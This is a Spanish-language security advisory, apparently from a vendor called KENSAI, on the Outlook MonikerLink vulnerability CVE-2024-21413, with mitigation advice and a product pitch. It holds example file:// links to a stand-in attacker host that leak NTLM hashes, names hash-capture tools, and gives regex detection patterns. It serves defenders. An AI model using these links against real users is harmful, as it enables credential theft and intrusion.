CVE-2024-21413: RCE MonikerLink en Microsoft Outlook
Conocida como «MonikerLink», CVE-2024-21413 es una vulnerabilidad crítica de Microsoft Outlook que elude la Vista protegida para lograr la ejecución remota de código y el robo de credenciales NTLM con solo obtener una vista previa de un correo malicioso. CVSS 9.8 CRÍTICA. No requiere ninguna interacción del usuario más allá de la vista previa del correo.
| Atributo | Valor |
|---|---|
| ID de CVE | CVE-2024-21413 |
| Vector CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-20: Validación incorrecta de entradas |
| Publicada | 13 de febrero de 2024 |
| Explotación | PoC pública — ampliamente explotada |
¿Qué es CVE-2024-21413?
CVE-2024-21413 explota la forma en que Microsoft Outlook gestiona los hipervínculos que contienen el carácter ! (signo de exclamación) como parte del URI de un moniker de archivo. Normalmente, Outlook aplica la «Vista protegida» a los documentos abiertos desde el correo electrónico y ejecuta los documentos de Office en un entorno aislado para impedir la ejecución de código. Esta vulnerabilidad elude por completo dicha protección.
Al crear un hipervínculo con el formato file://ATTACKER-SERVER/test.rtf!something, un atacante provoca que Outlook abra el archivo RTF sin la Vista protegida y, al mismo tiempo, inicia un intento automático de autenticación NTLM contra el servidor SMB del atacante. El atacante captura el hash NTLMv2 para descifrarlo sin conexión o utilizarlo en ataques de retransmisión.
🚨 Ataque desde el panel de vista previa — No requiere clics
Esta vulnerabilidad se activa en el panel de vista previa de Outlook. La víctima solo tiene que seleccionar el correo electrónico en su bandeja de entrada; no necesita abrir ningún archivo adjunto ni hacer clic en ningún enlace. En un entorno corporativo, un único correo de phishing enviado a una lista de distribución podría comprometer simultáneamente cientos de hashes NTLMv2.
Productos afectados
| Producto | Versiones afectadas |
|---|---|
| Microsoft Outlook 2016 | Anteriores a la actualización de febrero de 2024 |
| Microsoft Outlook 2019 | Anteriores a la actualización de febrero de 2024 |
| Microsoft Outlook LTSC 2021 | Anteriores a la actualización de febrero de 2024 |
| Microsoft 365 Apps for Enterprise | Anteriores a la actualización de febrero de 2024 |
No afectados: Outlook en la web (OWA), Outlook para iOS/Android y Outlook para Mac. La vulnerabilidad es específica de los clientes de escritorio de Outlook para Windows.
Mecánica del ataque: la técnica MonikerLink
COM (Modelo de objetos componentes) de Windows utiliza «monikers» para enlazar objetos por nombre. El esquema de URI file:// de Windows puede incluir un componente moniker después del carácter !, que indica a Windows que cargue y active el objeto COM referenciado.
# Enlace de archivo normal — Se aplica la Vista protegida file://attacker.com/share/document.rtf # Evasión con MonikerLink — ! elude la Vista protegida file://attacker.com/share/document.rtf!1337 # Cuando Outlook procesa el MonikerLink: # 1. Intenta conectarse mediante SMB a attacker.com # 2. Envía la autenticación NTLMv2 (se captura el hash) # 3. Abre el archivo sin la Vista protegida # 4. Si el archivo es un RTF malicioso → RCE
Flujo de captura del hash NTLM
Incluso sin un archivo RTF preparado como arma, el ataque de retransmisión NTLM tiene un impacto significativo:
- La víctima obtiene una vista previa del correo malicioso en Outlook
- Outlook establece automáticamente una conexión SMB con el servidor controlado por el atacante
- Windows envía el desafío-respuesta NTLMv2 (hash) para autenticarse
- El atacante captura el hash con Responder, Impacket o herramientas similares
- El hash se descifra sin conexión (las contraseñas débiles pueden descifrarse en horas) o se retransmite en tiempo real a otros servicios
Explotación en situaciones reales
Tras la publicación de la PoC, CVE-2024-21413 se incorporó en cuestión de días a kits comerciales de phishing. Las campañas observadas incluyeron:
- Recolección de credenciales corporativas: Correos masivos enviados a listas de distribución empresariales para capturar grandes volúmenes de hashes NTLM
- Acceso inicial dirigido: Spear phishing contra ejecutivos mediante correos personalizados que contenían cargas útiles de MonikerLink
- Cadenas de movimiento lateral: Retransmisión NTLM desde hashes capturados hacia servicios internos (SMB, LDAP, HTTP)
- Compromiso del correo empresarial: Recolección de credenciales para acceder a buzones y cometer fraudes BEC
Detección
Reglas de la puerta de enlace de correo electrónico
# Patrón regex para detectar MonikerLink en el cuerpo o los archivos adjuntos del correo # Detecta enlaces file:// que contienen el carácter ! \bfile:\/\/[^\s"']+![^\s"']* # Bloquea por completo los enlaces UNC/file externos (recomendado) \bfile:\/\/[^\s"']+ \\\\[a-z0-9.-]+\\
Detección de red
- Conexiones SMB desde estaciones de trabajo a direcciones IP externas (nunca deberían producirse)
- Intentos de autenticación NTLMv2 dirigidos a direcciones IP de destino inesperadas
- Consultas DNS a dominios controlados por atacantes desde clientes de correo
Detección en endpoints
- OUTLOOK.EXE iniciando conexiones TCP/445 salientes
- Procesos de Office generando procesos secundarios tras la vista previa de un correo electrónico
- Acceso a LSASS desde procesos de Office
Mitigación
- Aplicar los parches de febrero de 2024: La actualización de seguridad de Microsoft para Outlook corrige la evasión de la Vista protegida
- Bloquear el tráfico SMB saliente en el perímetro: Las reglas de firewall que bloquean el tráfico TCP/445 y TCP/139 saliente impiden capturar hashes NTLM incluso si se activa la vulnerabilidad
- Activar las protecciones contra la retransmisión NTLM: Configurar la firma SMB y la firma LDAP para impedir ataques de retransmisión
- Implementar una puerta de enlace de seguridad del correo electrónico: Bloquear los correos que contengan enlaces
file://y\\(rutas UNC) en el cuerpo y los archivos adjuntos - Desactivar NTLM cuando sea posible: Las organizaciones que utilizan Kerberos pueden desactivar NTLM para eliminar la vía de ataque de captura de hashes
💡 Defensa en profundidad: Aunque ya haya aplicado el parche a Outlook, bloquear el tráfico SMB saliente en el firewall es una práctica recomendada que impide toda esta clase de ataques. Muchas organizaciones permiten el tráfico SMB saliente por motivos relacionados con sistemas heredados de intercambio de archivos; audítelo y restrínjalo de inmediato.
Capacidad de detección de KENSAI
- Inventario de versiones del cliente de correo: KENSAI identifica las versiones de Outlook en toda su organización y señala las versiones sin parches vulnerables a CVE-2024-21413
- Simulación de phishing: El módulo de evaluación de phishing de KENSAI puede comprobar la susceptibilidad de los empleados ante señuelos similares a MonikerLink
- Análisis de exposición de red: Identifica firewalls mal configurados que permiten tráfico SMB saliente desde las estaciones de trabajo
- Cumplimiento de parches: Supervisión continua de los niveles de parche de Microsoft Office frente a la cobertura de CVE conocidas
¿Están sus clientes de Outlook protegidos con parches contra MonikerLink?
KENSAI analiza su flota de endpoints para detectar versiones vulnerables de Outlook e identifica las rutas de red que permitirían capturar hashes NTLM. Obtenga visibilidad en cuestión de minutos.
Evalúe la superficie de ataque de su correo electrónico →